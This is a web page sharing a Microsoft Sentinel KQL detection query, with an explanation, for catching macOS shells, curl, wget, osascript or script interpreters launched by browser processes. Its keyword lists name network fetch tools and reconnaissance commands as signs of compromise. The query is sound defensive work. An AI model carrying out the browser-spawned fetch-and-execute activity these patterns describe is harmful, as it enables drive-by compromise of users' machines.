KQL Search

Query Details

HomeAI ToolsDevice Query

Mac OS Suspicious Shell Or Direct Process Execution From Browser

Query

# *macOS Suspicious Shell or Direct Process Execution from Browser*

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title    | Link    |
| ---  | --- | --- |
| T1059 | Command and Scripting Interpreter | https://attack.mitre.org/techniques/T1059/ |

#### Description
This rule detects suspicious command-line activity originating from browser processes. It looks for shell processes (sh, bash, zsh, etc.) executing with suspicious keywords (curl, wget, whoami, pwd) or direct execution of suspicious binaries (curl, wget, osascript, pwsh, python*, perl*, php*) where the parent process is a web browser. This could indicate drive-by download attacks, malicious browser extensions, or exploitation of browser vulnerabilities leading to command execution.

#### Author <Optional>
- **Name: Benjamin Zulliger**
- **Github: https://github.com/benscha/KQLAdvancedHunting**
- **LinkedIn: https://www.linkedin.com/in/benjamin-zulliger/**

#### References


## Sentinel

```KQL
let BrowserProcesses = dynamic([
    "Google Chrome",
    "firefox",
    "Opera",
    "Safari",
    "com.apple.WebKit.WebContent",
    "Microsoft Edge"
]);
let ShellProcesses = dynamic(["sh", "bash", "dash", "ksh", "tcsh", "zsh"]);
let SuspiciousShellKeywords = dynamic(["curl", "nscurl", "wget", "whoami", "pwd"]);
let SuspiciousDirectProcesses = dynamic(["curl", "wget", "osascript", "pwsh"]);
// ---- Main Query ----
DeviceProcessEvents
| where Timestamp > ago(9m)
| where ActionType in ("ProcessCreated", "ProcessStarted")
// Parent process is a browser
| where InitiatingProcessFileName in~ (BrowserProcesses)
     or InitiatingProcessFileName startswith_cs "Google Chrome Helper"
// Two paths: Shell with suspicious arguments OR directly suspicious processes
| where
    (
        // Path 1: Shell process with suspicious keywords in the command line
        FileName in~ (ShellProcesses)
        and ProcessCommandLine != ""
        and (
            ProcessCommandLine has_any (SuspiciousShellKeywords)
        )
    )
    or
    (
        // Path 2: Directly suspicious processes (curl, wget, python*, perl*, php*, osascript, pwsh)
        FileName in~ (SuspiciousDirectProcesses)
        or FileName startswith "python"
        or FileName startswith "perl"
        or FileName startswith "php"
    )
// Command line must not be empty
| where isnotempty(ProcessCommandLine)
// Result projection
| project
    Timestamp,
    DeviceName,
    AccountName,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    FileName,
    ProcessCommandLine,
    FolderPath,
    ProcessId,
    InitiatingProcessId
| sort by Timestamp desc
```

Explanation

This query is designed to detect potentially malicious activities on macOS systems by monitoring for suspicious command-line executions that originate from web browsers. Here's a simplified breakdown of what the query does:

  1. Identify Browser Processes: It starts by defining a list of common web browser processes like Google Chrome, Firefox, Safari, and others.

  2. Identify Shell and Suspicious Processes: It also defines lists of shell processes (like sh, bash, zsh) and suspicious processes or keywords (like curl, wget, osascript, python, etc.) that are often used in malicious activities.

  3. Monitor Process Events: The query looks at recent process events (within the last 9 minutes) where a new process was created or started.

  4. Check Parent Process: It filters these events to find cases where the parent process is a web browser. This is important because it suggests that the command was initiated from a browser, which is unusual and potentially suspicious.

  5. Detect Suspicious Activity:

    • Path 1: It checks if a shell process is running with suspicious keywords in its command line, indicating potentially harmful commands being executed.
    • Path 2: It looks for direct execution of suspicious processes like curl, wget, or scripting languages (python, perl, php) without going through a shell.

  6. Ensure Command Line is Not Empty: It ensures that the command line information is not empty, which helps in identifying the exact command being executed.

  7. Output Relevant Information: Finally, it outputs details such as the timestamp, device name, account name, the browser process that initiated the command, the command line used, and other relevant identifiers.

This query helps in identifying drive-by download attacks, malicious browser extensions, or exploitation of browser vulnerabilities that lead to unauthorized command execution on macOS systems.

Details

Benjamin Zulliger profile picture

Benjamin Zulliger

Released: March 30, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessAccountNameCommandLineFolderPathProcessIdTimestamp

Operators

letdynamicagoinin~startswith_cshas_anyor!=isnotemptyprojectsort by

Actions